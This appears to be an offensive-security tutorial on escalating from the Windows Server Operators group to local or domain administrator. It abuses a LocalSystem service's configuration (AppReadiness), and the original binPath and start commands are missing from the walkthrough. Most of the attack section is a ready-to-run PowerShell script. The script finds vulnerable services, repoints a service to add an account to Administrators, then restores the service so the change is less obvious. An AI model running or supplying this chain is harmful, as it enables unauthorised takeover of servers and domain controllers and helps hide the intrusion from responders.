Server Operators

The Server Operators group allows members to administer Windows servers without being assigned Domain Admin privileges. It is a highly privileged built-in group: members can log on locally to servers, including Domain Controllers, where BUILTIN\Administrators is the domain's built-in Administrators group, so an escalation on a DC is effectively domain compromise.

Membership of this group confers SeBackupPrivilege and SeRestorePrivilege and the ability to control local services (start, stop and, where the service DACL allows it, reconfigure them).

This page focuses on abusing local services. Abusing SeBackupPrivilege/SeRestorePrivilege is covered in the Backup Operators section.

Attack

We look for a service that runs as LocalSystem, for example AppReadiness:

sc qc AppReadiness

SERVICE_START_NAME : LocalSystem in the output indicates the service runs as LocalSystem, so whatever binary it launches runs as SYSTEM.

Then we use PsService (the service viewer/controller from the Sysinternals suite) to check the permissions on the service by querying its DACL:

C:\hacker> psservice security AppReadiness

PsService v2.25 - Service information and configuration utility
Copyright (C) 2001-2010 Mark Russinovich
Sysinternals - www.sysinternals.com

SERVICE_NAME: AppReadiness
DISPLAY_NAME: App Readiness
        ACCOUNT: LocalSystem
        SECURITY:
        [ALLOW] NT AUTHORITY\SYSTEM
                Query status
                Query Config
                Interrogate
                Enumerate Dependents
                Pause/Resume
                Start
                Stop
                User-Defined Control
                Read Permissions
        [ALLOW] BUILTIN\Administrators
                All
        [ALLOW] NT AUTHORITY\INTERACTIVE
                Query status
                Query Config
                Interrogate
                Enumerate Dependents
                User-Defined Control
                Read Permissions
        [ALLOW] NT AUTHORITY\SERVICE
                Query status
                Query Config
                Interrogate
                Enumerate Dependents
                User-Defined Control
                Read Permissions
        [ALLOW] BUILTIN\Server Operators
                All

The [ALLOW] BUILTIN\Server Operators / All entry shows that members of Server Operators have full control over the service, which includes changing its configuration (SERVICE_CHANGE_CONFIG) and starting it (SERVICE_START).

Then we change the service's binary path (binPath) to a command of our choice, here one that adds our account to the Administrators group:

Then we start the service:

The start will fail with error 1053 (the service did not respond to the start or control request in a timely fashion). That is expected: cmd.exe is not a service executable and never reports back to the Service Control Manager, so the SCM times out, but by then the command has already executed as SYSTEM.

Log out and log back in so that a new access token carrying the new group membership is issued, and finally we confirm we're now members of the Administrators group:
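The whole chain above, from finding a suitable service to verifying the group change, as an added PowerShell example. This is not code from the original page: it is written here to show the procedure end to end, using the built-in sc.exe sdshow to read the service DACL instead of PsService, and it generalises the discovery step by scanning every LocalSystem service rather than only AppReadiness. It assumes it is run from an interactive session as a Server Operators member on the target server; $TargetUser, Find-ServerOperatorServices and Invoke-ServiceBinPathAbuse are names chosen for this example.

```powershell
# Added example, not code from the original page. Runs the Server Operators -> Administrators
# chain: find a LocalSystem service whose DACL gives Server Operators change-config and start
# rights, repoint its binary, start it, restore it, then verify the group change.
# Assumptions: interactive session as a Server Operators member on the target server;
# $TargetUser is a placeholder for the account being elevated.
# sc.exe is spelled out because 'sc' is a PowerShell alias for Set-Content.
$TargetUser = "$env:USERDOMAIN\$env:USERNAME"

# Step 1: enumerate LocalSystem services and parse each DACL from 'sc.exe sdshow'.
# In SDDL, 'SO' is the Server Operators SID alias, 'DC' is SERVICE_CHANGE_CONFIG,
# 'RP' is SERVICE_START and 'GA' is generic all (PsService prints that as "All").
function Find-ServerOperatorServices {
    Get-CimInstance Win32_Service -Filter "StartName='LocalSystem'" | ForEach-Object {
        $sddl = (sc.exe sdshow $_.Name | Where-Object { $_ -match '^D:' }) -join ''
        if ($sddl -match '\(A;;(?<mask>[A-Z]+);;;SO\)') {
            $mask = $Matches.mask
            if ($mask -eq 'GA' -or ($mask -match 'DC' -and $mask -match 'RP')) {
                [pscustomobject]@{ Name = $_.Name; BinPath = $_.PathName; Mask = $mask }
            }
        }
    }
}

# Step 2: point the service binary at a command, start the service, and always put the
# original binary path back so the service keeps working (and the change is less obvious).
function Invoke-ServiceBinPathAbuse {
    param([string]$ServiceName, [string]$Command)
    $original = (Get-CimInstance Win32_Service -Filter "Name='$ServiceName'").PathName
    try {
        # sc.exe requires the space after 'binPath='.
        sc.exe config $ServiceName binPath= "cmd.exe /c $Command" | Out-Null
        # Expect '[SC] StartService FAILED 1053': cmd.exe never talks to the SCM, so the
        # start times out, but the command has already run as SYSTEM by then.
        sc.exe start $ServiceName
    } finally {
        # Paths containing embedded quotes may need to be restored by hand.
        sc.exe config $ServiceName binPath= "$original" | Out-Null
    }
}

$candidate = Find-ServerOperatorServices | Select-Object -First 1
if (-not $candidate) { throw 'No LocalSystem service grants Server Operators change-config and start.' }
"Using service $($candidate.Name) (SO mask: $($candidate.Mask))"
Invoke-ServiceBinPathAbuse -ServiceName $candidate.Name `
    -Command "net localgroup Administrators $TargetUser /add"

# Step 3: the new membership is only present in a fresh logon token, so log off and back on
# (or open a new session) before relying on it. This only shows the group now lists us.
net localgroup Administrators
```

Restoring the original binPath matters in practice: leaving a core service pointed at cmd.exe breaks it for everyone and is the first thing a responder will notice in the System event log, where the reconfiguration (event ID 7040) and the failed start (7000/7009) are recorded regardless.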
